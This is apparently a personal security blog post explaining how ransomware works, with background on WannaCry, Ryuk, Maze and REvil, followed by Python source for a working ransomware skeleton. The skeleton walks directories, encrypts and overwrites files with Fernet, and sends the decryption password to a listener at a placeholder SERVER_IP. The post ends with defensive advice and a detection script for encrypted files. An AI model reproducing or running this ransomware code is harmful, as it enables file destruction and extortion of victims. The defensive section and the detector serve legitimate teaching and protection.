What is Ransomware? How does it work?

Ransomware is malware designed to deny a user or organization access to files on their computer. By encrypting these files and demanding a ransom payment for the decryption key, cyberattackers place organizations in a position where paying the ransom is the easiest and cheapest way to regain access to their files. Some variants have added additional functionality – such as data theft – to provide further incentive for ransomware victims to pay the ransom.

Ransomware has quickly become the most prominent and visible type of malware. Recent ransomware attacks have impacted hospitals’ ability to provide vital services, crippled public services in cities, and caused significant damage to various organizations.

The modern ransomware wave began with the arrival of WannaCry in 2017. Attacks have multiplied since, and well-known ransomware families have been born. Today we are speaking about different families using various techniques to get the highest results; some of the best-known are:

1 - Ryuk is one of the most expensive types of ransomware in existence: the average demand for Ryuk is over one million dollars.

2 - Maze was the first ransomware with the ability to combine file encryption and data theft. If the victim does not pay the ransom, the sensitive data that Maze already collected before encrypting the files is made public, in order to push the victim further and oblige it to pay the demands.

3 - REvil is actually the most well-known, especially after the Russian-Ukrainian conflict. REvil is another ransomware variant that targets large organizations. The ransomware, which has been operated by the Russian-speaking REvil group since 2019, has been responsible for many big breaches such as 'Kaseya' and 'JBS'. It has competed with Ryuk over the last several years for the title of the most expensive ransomware variant.

After hearing a lot of stories, it will be really interesting to understand the basic theory behind ransomware. To do that, I am using in this article an upgraded version of the malware I created in the 'Malware Creation' workshop of the Spyro event organized by Engineers Spark FST and Google Developer Community on Saturday 28-05-2022.

All these ransomware families share the same operating steps:

Infection and Distribution Vectors:

Like any other kind of malware, ransomware can gain access in different ways. The most common one is through phishing attacks: the attacker sends an email to the victim with a malicious file or with a link to a malicious website; when the victim clicks on the link, the ransomware is downloaded onto the victim's device and starts the second phase. Another way is that the attacker exploits a vulnerability to get remote access to the victim's device and then downloads the ransomware directly.

Before we move to the second phase, let's try to understand the initialization we need to prepare so that our ransomware will work. First of all, we need to create a server that will communicate with the ransomware; to do so we will use the same techniques used to create the reverse shell server. This communication will be essential for us to receive the decryption key once it is generated.

So we are going to initialize the server with the following code; if you want to understand this code in detail, you can read my previous article, Reverse Shell Theory.

    import socket

    server_ip = '0.0.0.0'        # listen on every interface
    server_port = 443
    data_size = 1024 * 500
    cyber = socket.socket()
    cyber.bind((server_ip, server_port))
    cyber.listen(10)
    client_socket, client_ip = cyber.accept()      # block until the ransomware connects back
    key = client_socket.recv(data_size).decode()   # the password sent by cyber_send()
    print(key)

Data Encryption

This is the most important part of ransomware and the main goal of the attacker. The majority of ransomware families use AES encryption. AES, or Advanced Encryption Standard, is one of the best-known symmetric block ciphers; it is generally used by governments to encrypt sensitive data. AES was developed for the first time by NIST (the National Institute of Standards and Technology) in 1997 in order to replace DES, which had become vulnerable to brute-force attacks. There are three variants of the AES algorithm (AES-128, AES-192 and AES-256), where 128, 192 and 256 are the lengths in bits of the keys used.

The government classifies information into three categories: Confidential, Secret, or Top Secret. Confidential and Secret data can be encrypted with any of the three AES variants, but Top Secret data should be encrypted using AES-256. Famous ransomware like WannaCry uses a hybrid scheme combining AES-256 and RSA encryption; this makes the reverse engineering that would let us decrypt the data without knowing the keys hard and practically impossible. In this article, I will be using a similar but simpler scheme in order to make the theory behind ransomware easy to understand. This is why I am going to generate my keys using Fernet, a symmetric encryption scheme that guarantees that a message encrypted with it cannot be manipulated or read without the key.

To create our educational ransomware we are going to use the following libraries:

tkinter

The tkinter package ("Tk interface") is the standard Python interface to the Tcl/Tk GUI toolkit. Both Tk and tkinter are available on most Unix platforms, including macOS, as well as on Windows systems.

os

This module provides a portable way of using operating system-dependent functionality.

cryptography.fernet

cryptography is a package that provides cryptographic recipes and primitives to Python developers.

string

The Python string module contains some constants, utility functions, and classes for string manipulation.

socket

This module provides access to the BSD socket interface. It is available on all modern Unix systems, Windows, macOS, and probably additional platforms.

    from tkinter import *
    import os
    from cryptography.fernet import Fernet
    import string
    import random
    import socket        

After importing all the packages we will use, it will be essential for us to identify our location on the system and start walking all the directories and sub-directories in order to encrypt the files. To do so, I created this list of file extensions that we are allowed to encrypt (this is made to make sure that I will not lose my own files during the test phase).

    encrypted_ext = (".mp4", ".py", ".txt", ".docx", ".odt", ".xlsx", ".gif", ".png", ".jpeg", ".pdf")

    victim_file = []
    for root, dirs, files in os.walk('.'):
        for file in files:
            if file == "cyber_ran.py":        # never encrypt the script itself
                continue
            file_path, file_ext = os.path.splitext(root + '/' + file)
            if file_ext in encrypted_ext:
                victim_file.append(root + '/' + file)
    encrypt(victim_file)    # encrypt() is defined below; in a script it must be defined before this call

What I did is create an empty list in which to store the full paths of the files we are going to encrypt. These files are found using the walk function of the os module. I also made sure that the ransomware will not encrypt itself with the condition if file == "cyber_ran.py": continue.

Now we have a full list of the files we want to encrypt, but we need the function that will actually encrypt them. That's why I created the encrypt function, which takes as input the list of files to encrypt, victim_file:

    def encrypt(victim_file):
        key = Fernet.generate_key()                  # one symmetric key for every file
        for loop in victim_file:
            with open(loop, "rb") as file:
                content = file.read()
            content_enc = Fernet(key).encrypt(content)
            with open(loop, "wb") as file:           # overwrite the original with the Fernet token
                file.write(content_enc)
        password = password_gen()                    # password_gen() is not shown in this article
        cyber_send(password)
        decrypt(password, key)

We generated our encryption key using Fernet.generate_key, then we retrieve the content of each file using open(loop, "rb") as file: content = file.read(). Once we have the content, we encrypt it with Fernet(key).encrypt(content) and overwrite the file with the encrypted content. Finally, we send the password needed to decrypt the files to the server using the cyber_send(password) function and launch the ransom demand.

The code of the cyber_send(password) function is the following:

    def cyber_send(password):
        server_host = "SERVER_IP"     # placeholder: address of the listener started above
        server_port = 443
        data_size = 1024 * 128        # unused here
        SEPARATOR = "<sep>"           # unused here
        victim = socket.socket()
        victim.connect((server_host, server_port))
        victim.send(password.encode())
        victim.close()

Obviously, what we have done is connect to the server that we created at the beginning; once the connection is successful, we send the password to the server and close the communication directly after that.

Now the attacker has encrypted the files and made sure that he has the key that the victim will need to decrypt and restore his files.

    def decrypt(password, key):
        def button_command(password, key):
            key1 = entry1.get()    # entry1: the Entry widget of the ransom window (its construction is not shown here)
            if key1 == password:
                for loop in victim_file:
                    with open(loop, "rb") as file:
                        content = file.read()
                    content_dec = Fernet(key).decrypt(content)
                    with open(loop, "wb") as file:
                        file.write(content_dec)
                print("good boy you did well!!")
                quit()
            else:
                print("you are hacked!! don't play dump")

So what we did is create this window:

[Image: the ransom demand window]

If the victim pays the ransom, he receives the decryption password and the decryption process starts; if not, he receives the message 'you are hacked!! don't play dump'.

How To Defend against Ransomware

I really believe that preparing is better than paying. The best ways to defend against ransomware are:

1 - Cyber awareness: we should make sure that our personnel are aware of cyber-attacks by training users to identify and avoid potential ransomware attacks targeting their email addresses and their social media accounts.

2 - Always keep an encrypted backup on dedicated hardware that is not connected to the network. A backup is crucial in cyber attacks, especially when it comes to ransomware that tries to encrypt our data.

3 - Patching is one of the most important steps when it comes to securing our company. Making sure that all our software is patched is important because attackers usually exploit new vulnerabilities and the latest published exploits; patching helps us reduce the access points that attackers can use.

4 - Conduct regular vulnerability scanning to identify and address vulnerabilities, especially on internet-facing devices, to limit the attack surface.

5 - Having a functional anti-ransomware solution will help us identify possible ransomware. How? Ransomware needs to encrypt the system's files, which gives it a distinctive fingerprint while running; this allows anti-ransomware solutions to identify the danger quickly, and they often include the ability to automatically restore the data.
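The fingerprint mentioned in point 5 can be illustrated with the Fernet scheme used in the Data Encryption section: every Fernet token starts with the version byte 0x80, so in base64 form every encrypted file begins with "gAAAAA", and raw ciphertext shows up as a normally plain-text file with near-maximal byte entropy. The following detector is an added example, not code from the original article; it scans a directory for both signals on a constructed sample (the Fernet-shaped file is built from random bytes with the real token layout, not from a real key).

```python
import base64
import math
import os
import tempfile
import time

# Added detection example, not code from the original article. A Fernet token decodes to
# version 0x80, an 8-byte timestamp, a 16-byte IV, AES-CBC ciphertext and a 32-byte HMAC,
# so its base64 form always starts with "gAAAAA" for any current timestamp.
FERNET_PREFIX = b"gAAAAA"
TEXT_EXTS = {".txt", ".py"}   # extensions whose content should never look random

def shannon_entropy(data: bytes) -> float:
    # bits of entropy per byte: random or encrypted bytes approach 8.0, text stays well below
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(bytes([b])) for b in set(data)))

def looks_fernet_token(data: bytes) -> bool:
    """Structural check only: header, base64 validity and token length."""
    if not data.startswith(FERNET_PREFIX):
        return False
    try:
        raw = base64.urlsafe_b64decode(data.strip())
    except ValueError:
        return False
    # 25 header bytes, ciphertext in whole 16-byte blocks, 32-byte HMAC
    return raw[0] == 0x80 and len(raw) >= 73 and (len(raw) - 57) % 16 == 0

def scan_directory(path: str) -> dict:
    """Map each suspicious file under path to the reason it was flagged."""
    flagged = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                data = fh.read()
            if looks_fernet_token(data):
                flagged[full] = "fernet-token"
            elif (os.path.splitext(name)[1] in TEXT_EXTS and len(data) >= 1024
                  and shannon_entropy(data) > 7.5):
                flagged[full] = "high-entropy"
    return flagged

def demo() -> set:
    """Constructed sample: a clean file, a Fernet-shaped file and a random one."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "notes.txt"), "wb") as fh:
        fh.write(b"quarterly report draft\n" * 100)
    # Fernet layout: current timestamp, random stand-ins for IV, 2 blocks and HMAC (constructed)
    token = b"\x80" + int(time.time()).to_bytes(8, "big") + os.urandom(16 + 32 + 32)
    with open(os.path.join(d, "report.py"), "wb") as fh:
        fh.write(base64.urlsafe_b64encode(token))
    with open(os.path.join(d, "data.txt"), "wb") as fh:
        fh.write(os.urandom(4096))    # stands in for raw AES output
    return set(scan_directory(d).values())
```

The entropy signal is only meaningful for extensions that are plain text; the .png, .pdf or .docx files in the article's extension list are already compressed and score high even when untouched, which is why the header check is needed for those.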

References used: Check Point Cyber Hub; "Ransomware encryption techniques" by Tarcísio Marinho; TechTarget; docs.python.org; cisa.gov.

Source: https://cybereagle2001.github.io/Blog/
